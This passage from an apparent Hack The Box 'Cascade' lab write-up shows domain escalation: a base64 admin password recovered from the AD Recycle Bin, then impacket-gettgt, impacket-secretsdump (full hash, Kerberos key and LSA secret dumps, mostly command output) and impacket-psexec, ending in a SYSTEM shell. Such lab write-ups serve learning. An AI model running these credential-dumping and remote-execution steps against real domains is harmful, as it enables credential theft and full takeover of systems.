AD Recycle Bin
When I first enumerated the group membership of the arksvc account via bloodhound, I was very much confused as the user didn’t appear to have any privilege-escalation vector
I also didn’t think much of the the AD Recycle Bin group as it is not a default AD group
upon further research, i found out that ad recycle bin is a built-in ad feature that could potentially be used to list and recover AD objects
according to microsoft: The Active Directory (AD) Recycle Bin is a feature in Windows Server that helps recover deleted objects in an Active Directory environment. It retains deleted objects in the directory database, allowing administrators to restore them to their original state. The Recycle Bin supports granular recovery, enabling restoration of individual objects or entire organizational units. It requires a minimum domain functional level of Windows Server 2008 R2 and forest functional level of Windows Server 2008. Only users with appropriate administrative permissions can enable or disable the feature.
AD Recycle Bin being present as a domain group within the target domain strongly suggests that the group likely has either GPO or ACL configured to access such feature
i can confirm this by using the powershell cmdlet available from the built-in AD module.
*evil-winrm* ps c:\Users> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
canonicalname : cascade.local/Deleted Objects
cn : Deleted Objects
created : 1/9/2020 3:31:39 PM
createtimestamp : 1/9/2020 3:31:39 PM
deleted : True
description : Default container for deleted objects
displayname :
distinguishedname : CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
instancetype : 4
iscriticalsystemobject : True
isdeleted : True
lastknownparent :
modified : 1/13/2020 1:21:17 AM
modifytimestamp : 1/13/2020 1:21:17 AM
name : Deleted Objects
objectcategory : CN=Container,CN=Schema,CN=Configuration,DC=cascade,DC=local
objectclass : container
objectguid : 51de9801-3625-4ac2-a605-d6bd71617681
protectedfromaccidentaldeletion :
sdrightseffective : 0
showinadvancedviewonly : True
systemflags : -1946157056
usnchanged : 65585
usncreated : 5695
whenchanged : 1/13/2020 1:21:17 AM
whencreated : 1/9/2020 3:31:39 PM
accountexpires : 9223372036854775807
badpasswordtime : 0
badpwdcount : 0
canonicalname : cascade.local/Deleted Objects/CASC-WS1
del:6d97daa4-2e82-4946-a11e-f91fa18bfabe
cn : CASC-WS1
del:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codepage : 0
countrycode : 0
created : 1/9/2020 7:30:19 PM
createtimestamp : 1/9/2020 7:30:19 PM
deleted : True
description :
displayname :
distinguishedname : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instancetype : 4
iscriticalsystemobject : False
isdeleted : True
lastknownparent : OU=Computers,OU=UK,DC=cascade,DC=local
lastlogoff : 0
lastlogon : 0
localpolicyflags : 0
logoncount : 0
modified : 1/28/2020 6:08:35 PM
modifytimestamp : 1/28/2020 6:08:35 PM
msds-lastknownrdn : CASC-WS1
name : CASC-WS1
del:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : computer
objectguid : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
objectsid : S-1-5-21-3332504370-1206983947-1165150453-1108
primarygroupid : 515
protectedfromaccidentaldeletion : False
pwdlastset : 132230718192147073
samaccountname : CASC-WS1$
sdrightseffective : 0
useraccountcontrol : 4128
usnchanged : 245849
usncreated : 24603
whenchanged : 1/28/2020 6:08:35 PM
whencreated : 1/9/2020 7:30:19 PM
canonicalname : cascade.local/Deleted Objects/Scheduled Tasks
del:13375728-5ddb-4137-b8b8-b9041d1d3fd2
cn : Scheduled Tasks
del:13375728-5ddb-4137-b8b8-b9041d1d3fd2
created : 1/13/2020 5:21:53 PM
createtimestamp : 1/13/2020 5:21:53 PM
deleted : True
description :
displayname :
distinguishedname : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/17/2020 9:35:46 PM, 1/17/2020 9:32:57 PM, 1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM...}
grouptype : -2147483644
instancetype : 4
isdeleted : True
lastknownparent : OU=Groups,OU=UK,DC=cascade,DC=local
modified : 1/28/2020 6:07:55 PM
modifytimestamp : 1/28/2020 6:07:55 PM
msds-lastknownrdn : Scheduled Tasks
name : Scheduled Tasks
del:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : group
objectguid : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
objectsid : S-1-5-21-3332504370-1206983947-1165150453-1131
protectedfromaccidentaldeletion : False
samaccountname : Scheduled Tasks
sdrightseffective : 0
usnchanged : 245848
usncreated : 114790
whenchanged : 1/28/2020 6:07:55 PM
whencreated : 1/13/2020 5:21:53 PM
canonicalname : cascade.local/Deleted Objects/{A403B701-A528-4685-A816-FDEE32BDDCBA}
del:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
cn : {A403B701-A528-4685-A816-FDEE32BDDCBA}
del:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
created : 1/26/2020 2:34:30 AM
createtimestamp : 1/26/2020 2:34:30 AM
deleted : True
description :
displayname : Block Potato
distinguishedname : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
flags : 0
gpcfilesyspath : \\cascade.local\SysVol\cascade.local\Policies\{A403B701-A528-4685-A816-FDEE32BDDCBA}
gpcfunctionalityversion : 2
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}]
instancetype : 4
isdeleted : True
lastknownparent : CN=Policies,CN=System,DC=cascade,DC=local
modified : 1/26/2020 2:40:52 AM
modifytimestamp : 1/26/2020 2:40:52 AM
msds-lastknownrdn : {A403B701-A528-4685-A816-FDEE32BDDCBA}
name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
del:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : groupPolicyContainer
objectguid : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
protectedfromaccidentaldeletion : False
sdrightseffective : 0
showinadvancedviewonly : True
usnchanged : 196701
usncreated : 196688
versionnumber : 2
whenchanged : 1/26/2020 2:40:52 AM
whencreated : 1/26/2020 2:34:30 AM
canonicalname : cascade.local/Deleted Objects/Machine
del:93c23674-e411-400b-bb9f-c0340bda5a34
cn : Machine
del:93c23674-e411-400b-bb9f-c0340bda5a34
created : 1/26/2020 2:34:31 AM
createtimestamp : 1/26/2020 2:34:31 AM
deleted : True
description :
displayname :
distinguishedname : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
instancetype : 4
isdeleted : True
lastknownparent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
modified : 1/26/2020 2:40:52 AM
modifytimestamp : 1/26/2020 2:40:52 AM
msds-lastknownrdn : Machine
name : Machine
del:93c23674-e411-400b-bb9f-c0340bda5a34
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : container
objectguid : 93c23674-e411-400b-bb9f-c0340bda5a34
protectedfromaccidentaldeletion : False
sdrightseffective : 0
showinadvancedviewonly : True
usnchanged : 196699
usncreated : 196689
whenchanged : 1/26/2020 2:40:52 AM
whencreated : 1/26/2020 2:34:31 AM
canonicalname : cascade.local/Deleted Objects/User
del:746385f2-e3a0-4252-b83a-5a206da0ed88
cn : User
del:746385f2-e3a0-4252-b83a-5a206da0ed88
created : 1/26/2020 2:34:31 AM
createtimestamp : 1/26/2020 2:34:31 AM
deleted : True
description :
displayname :
distinguishedname : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/1/1601 12:00:00 AM}
instancetype : 4
isdeleted : True
lastknownparent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
modified : 1/26/2020 2:40:52 AM
modifytimestamp : 1/26/2020 2:40:52 AM
msds-lastknownrdn : User
name : User
del:746385f2-e3a0-4252-b83a-5a206da0ed88
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : container
objectguid : 746385f2-e3a0-4252-b83a-5a206da0ed88
protectedfromaccidentaldeletion : False
sdrightseffective : 0
showinadvancedviewonly : True
usnchanged : 196700
usncreated : 196690
whenchanged : 1/26/2020 2:40:52 AM
whencreated : 1/26/2020 2:34:31 AM
accountexpires : 9223372036854775807
badpasswordtime : 0
badpwdcount : 0
canonicalname : cascade.local/Deleted Objects/TempAdmin
del:f0cc344d-31e0-4866-bceb-a842791ca059
cascade`lega`cypwd : YmFDVDNyMWFOMDBkbGVz
cn : TempAdmin
del:f0cc344d-31e0-4866-bceb-a842791ca059
codepage : 0
countrycode : 0
created : 1/27/2020 3:23:08 AM
createtimestamp : 1/27/2020 3:23:08 AM
deleted : True
description :
displayname : TempAdmin
distinguishedname : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dscorepropagationdata : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenname : TempAdmin
instancetype : 4
isdeleted : True
lastknownparent : OU=Users,OU=UK,DC=cascade,DC=local
lastlogoff : 0
lastlogon : 0
logoncount : 0
modified : 1/27/2020 3:24:34 AM
modifytimestamp : 1/27/2020 3:24:34 AM
msds-lastknownrdn : TempAdmin
name : TempAdmin
del:f0cc344d-31e0-4866-bceb-a842791ca059
ntsecuritydescriptor : System.DirectoryServices.ActiveDirectorySecurity
objectcategory :
objectclass : user
objectguid : f0cc344d-31e0-4866-bceb-a842791ca059
objectsid : S-1-5-21-3332504370-1206983947-1165150453-1136
primarygroupid : 513
protectedfromaccidentaldeletion : False
pwdlastset : 132245689883479503
samaccountname : TempAdmin
sdrightseffective : 0
useraccountcontrol : 66048
userprincipalname : TempAdmin@cascade.local
usnchanged : 237705
usncreated : 237695
whenchanged : 1/27/2020 3:24:34 AM
whencreated : 1/27/2020 3:23:08 AMWhile I was able to confirmed the group’s capability, a notable attribute caught up my eye; cascadeLegacyPwd
The cascadeLegacyPwd attribute was also present in the r.thompson user as an LDAP attribute.
The value also appears to be encoded in the base64 format
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dlesThat definitely does look like a password
According to the earlier email from the s.smith user, the password for the temporary account (TempAdmin) is the same as the normal admin account password
This means that the above password likely belongs to the administrator user
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-gettgt cascade.local/administrator:baCT3r1aN00dles -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in administrator.ccacheYes, it indeed was. TGT created.
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump 'CASCADE.LOCAL/@casc-dc1.cascade.local' -k -no-pass -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x3c67174689c6b5a53b5e3227e338e2ad
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d256a4c6553e66da3c7872179eeb7d26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CASCADE\CASC-DC1$:plain_password_hex:8123b076754b82690d5a11f18dd609eeec38332837deb718b260bf06af0490659e2bbb76281080c9ee010485b1f99f7e9ffa976254ba0085b86d7a6b7763708d726dd8fde95eb2e3abc7a81b2c4b8a7429ca27b23e42b8c581a6e4ef3245ec624eea3366df194174b5e0adb86fd2812e5acf78bb7a664b4776c3a299c1916faf7104a6febe4cbd5b6a846b1b85855a22311376193f810bc4257efab0927c9e41188a3cf39b98ef04fa347320fbe3052bebd99ee1d316003c7f5657fc55ee6560b001e3f3e619cb8cb045bd613b5d93cde6a91ede70109fd88d7b11798293a0bd08047270d5e1c8df46a4b9981593f44e
CASCADE\CASC-DC1$:aad3b435b51404eeaad3b435b51404ee:6e50af3640b94895528bcec9176f7cd7:::
[*] DefaultPassword
CASCADE\vbscrub:mario128
[*] DPAPI_SYSTEM
dpapi_machinekey:0xfde585c8ff6d34a3e4677fd263b5acc5ce275c7c
dpapi_userkey:0x31742d7265952f5e193ace0bb04758eaf0414edb
[*] NL$KM
0000 86 51 61 06 1D D3 36 7D 2D 50 2D AB 02 B9 E2 8E .Qa...6}-P-.....
0010 DD 3F 75 C5 DE 35 8F E4 B7 D5 E6 39 5C D4 D2 DF .?u..5.....9\...
0020 D7 AA A2 D3 C3 18 8B 56 E3 1F 3F 77 8E 8F E0 38 .......V..?w...8
0030 B9 B6 3E 5F 6C 09 F3 37 E8 64 FD E1 6E 01 D6 2A ..>_l..7.d..n..*
NL$KM:865161061dd3367d2d502dab02b9e28edd3f75c5de358fe4b7d5e6395cd4d2dfd7aaa2d3c3188b56e31f3f778e8fe038b9b63e5f6c09f337e864fde16e01d62a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
cascade.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:7c2ea40b06d267f1557a09ac086b4487:::
cascade.local\CascGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3a1b37192392d74e86d04242288dc147:::
cascade.local\arksvc:1106:aad3b435b51404eeaad3b435b51404ee:10ffc991edaa4635cf81eb91762420cb:::
cascade.local\s.smith:1107:aad3b435b51404eeaad3b435b51404ee:b48b49789458698abadc119c8e310703:::
cascade.local\r.thompson:1109:aad3b435b51404eeaad3b435b51404ee:63251f7b1bada5082e5ffb18261ba28f:::
cascade.local\util:1111:aad3b435b51404eeaad3b435b51404ee:49a914ea7201025aeff21cd858ec7d66:::
cascade.local\j.wakefield:1116:aad3b435b51404eeaad3b435b51404ee:13ae5d7704258917054d662d016eab60:::
cascade.local\s.hickson:1121:aad3b435b51404eeaad3b435b51404ee:2776416ceb426c515cab11bb8411067b:::
cascade.local\j.goodhand:1122:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\a.turnbull:1124:aad3b435b51404eeaad3b435b51404ee:1d6eb7e45708504e0a9646b7aea9fc9b:::
cascade.local\e.crowe:1127:aad3b435b51404eeaad3b435b51404ee:95d4f729c16ae37b910317d665ba2215:::
cascade.local\b.hanson:1128:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\d.burman:1129:aad3b435b51404eeaad3b435b51404ee:5da61ebae419b915627f25f101fe6b1b:::
cascade.local\BackupSvc:1130:aad3b435b51404eeaad3b435b51404ee:c27e154566c4788326fce339f4b55491:::
cascade.local\j.allen:1134:aad3b435b51404eeaad3b435b51404ee:64928a685f9a995045f8c04bbf86881d:::
cascade.local\i.croft:1135:aad3b435b51404eeaad3b435b51404ee:431682a8242a237e805badacab95b0e4:::
CASC-DC1$:1001:aad3b435b51404eeaad3b435b51404ee:6e50af3640b94895528bcec9176f7cd7:::
[*] Kerberos keys grabbed
cascade.local\administrator:aes256-cts-hmac-sha1-96:201b2d849679d315b51959d1acd879032e1f6dba6fa9feb772a2d985edc2c2cf
cascade.local\administrator:aes128-cts-hmac-sha1-96:5ebdd49d14c5b62141ab0e6a2780ef70
cascade.local\administrator:des-cbc-md5:1532f8259b2c4f45
krbtgt:aes256-cts-hmac-sha1-96:25deaf37ed42e5cd95b76850d9d76fa663fcce3a9512f31357f5e45d333ca5ea
krbtgt:aes128-cts-hmac-sha1-96:22f5ccb8e68382406cb6e3c24c706208
krbtgt:des-cbc-md5:fba77f5b31239d9e
cascade.local\arksvc:aes256-cts-hmac-sha1-96:3717cd1cd9e13ac692bd99e0de0bbdd7910296f8d1f465cb559f76eb63f21bcc
cascade.local\arksvc:aes128-cts-hmac-sha1-96:0e34dc2f704261583d5f0bfbdf4cac14
cascade.local\arksvc:des-cbc-md5:73f2c423982534a8
cascade.local\s.smith:aes256-cts-hmac-sha1-96:c5b64b93302ccfb91648acea44a708797371bcec306a74a42d614365329635ce
cascade.local\s.smith:aes128-cts-hmac-sha1-96:4cc2dc914d7d971f3708dba510b1a1e9
cascade.local\s.smith:des-cbc-md5:6be0fdeab6cec762
cascade.local\r.thompson:aes256-cts-hmac-sha1-96:d5bf934e36dbbb73b35345f08117b844874b343c9149095ff86034172272259e
cascade.local\r.thompson:aes128-cts-hmac-sha1-96:def0284f32bcaa0291184f0e6b2a8af0
cascade.local\r.thompson:des-cbc-md5:89e3da3dc74576d9
cascade.local\util:aes256-cts-hmac-sha1-96:9e74ea4fa951ebe411bb9d734c48202fd346a21e414bc61c49ff14b41ba14bb5
cascade.local\util:aes128-cts-hmac-sha1-96:cadfed05f20d4ca27ffa30b30664dbae
cascade.local\util:des-cbc-md5:c4a8765b4f3db901
cascade.local\j.wakefield:aes256-cts-hmac-sha1-96:c3a6a1518a513ef2344859b204692d92adea4c78a6b8539e1743cfcbeb85dc5c
cascade.local\j.wakefield:aes128-cts-hmac-sha1-96:134734b88534d38ce5bd786bac268f07
cascade.local\j.wakefield:des-cbc-md5:a876678997570e6d
cascade.local\s.hickson:aes256-cts-hmac-sha1-96:ebdd5dd6e9d0dfac16983b005db8e84b482250740bc3e64b0e58ae30f7e7a7b5
cascade.local\s.hickson:aes128-cts-hmac-sha1-96:83b64186d9c5d8e74b44d6efa3b19ed7
cascade.local\s.hickson:des-cbc-md5:ce8c2f9dfe3b3ddf
cascade.local\j.goodhand:aes256-cts-hmac-sha1-96:770b3bd99ce9b17bbf3e35a839615eb1204cbae05990db83e9393a2564c2f8ed
cascade.local\j.goodhand:aes128-cts-hmac-sha1-96:11ccc9eea5401915a46406441e50ed8f
cascade.local\j.goodhand:des-cbc-md5:fb9226a16d94ba64
cascade.local\a.turnbull:aes256-cts-hmac-sha1-96:4adfe6a4be270895c5a55e440e2a14d70db45f4729d82caff0c157140729f3f1
cascade.local\a.turnbull:aes128-cts-hmac-sha1-96:89c3c86c69648eea1e589db7316710ae
cascade.local\a.turnbull:des-cbc-md5:2c076e23493ef7ba
cascade.local\e.crowe:aes256-cts-hmac-sha1-96:c6459e3f1647f02bd9528bca926beb8bfc944b42f3b12d9777fbdc59431fdc43
cascade.local\e.crowe:aes128-cts-hmac-sha1-96:6d36444d8f1b1a4bda6d7c4118ed61d9
cascade.local\e.crowe:des-cbc-md5:f445588fae23a729
cascade.local\b.hanson:aes256-cts-hmac-sha1-96:a6071c3a20a3ce2e373e8586ef7bd12cb665eb6ee66d110df57ee9f703b528f0
cascade.local\b.hanson:aes128-cts-hmac-sha1-96:34f9f21922871be23e9bedc3fc1741cd
cascade.local\b.hanson:des-cbc-md5:57ef54d568d03e86
cascade.local\d.burman:aes256-cts-hmac-sha1-96:b6a2a64a272ba6c7d2cf638b8614a370d597bc167222555ec655facca6ebfe08
cascade.local\d.burman:aes128-cts-hmac-sha1-96:310087249254f69e0436b2113f08909e
cascade.local\d.burman:des-cbc-md5:83313268372502c2
cascade.local\BackupSvc:aes256-cts-hmac-sha1-96:ffba7ff6b18eba90d46d787e56a0a0ebba7c8d933f992f2b896e5c7ec7da8720
cascade.local\BackupSvc:aes128-cts-hmac-sha1-96:854bd600cad9e7cd309eb124039b25a7
cascade.local\BackupSvc:des-cbc-md5:9ea4d0da8cdcbcef
cascade.local\j.allen:aes256-cts-hmac-sha1-96:56a9256363211ec2ac9ac5d64ddc931b10123bdf4ce4a90c4eee14aab91e401a
cascade.local\j.allen:aes128-cts-hmac-sha1-96:7f03f34bc8c2919a6b6ddd22c983d23c
cascade.local\j.allen:des-cbc-md5:a1b0c14f0ec715a8
cascade.local\i.croft:aes256-cts-hmac-sha1-96:a26cfa25eeb98248137d57f00a509aca41a091218b5a9971ca6af7cd0552c469
cascade.local\i.croft:aes128-cts-hmac-sha1-96:ac531c4553b8f5c2f62614d91e9864e5
cascade.local\i.croft:des-cbc-md5:b6f89862bf854cf1
CASC-DC1$:aes256-cts-hmac-sha1-96:3949b480e6387e1265309333c1486b8426bf71f5a126bbdeba703e01b5b50491
CASC-DC1$:aes128-cts-hmac-sha1-96:480e4ca495da12dd4a1e48b1e4a04664
CASC-DC1$:des-cbc-md5:80cdc808a2645db5
[*] Cleaning up... Domain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec 'CASCADE.LOCAL/@casc-dc1.cascade.local' -k -no-pass -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file krOBKGuo.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service jWCx on 10.10.10.182.....
[*] Starting service jWCx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
CASC-DC1
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
link-local ipv6 address . . . . . : fe80::e8dc:7157:1983:a2bd%15
ipv4 address. . . . . . . . . . . : 10.10.10.182
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
10.10.10.2
tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise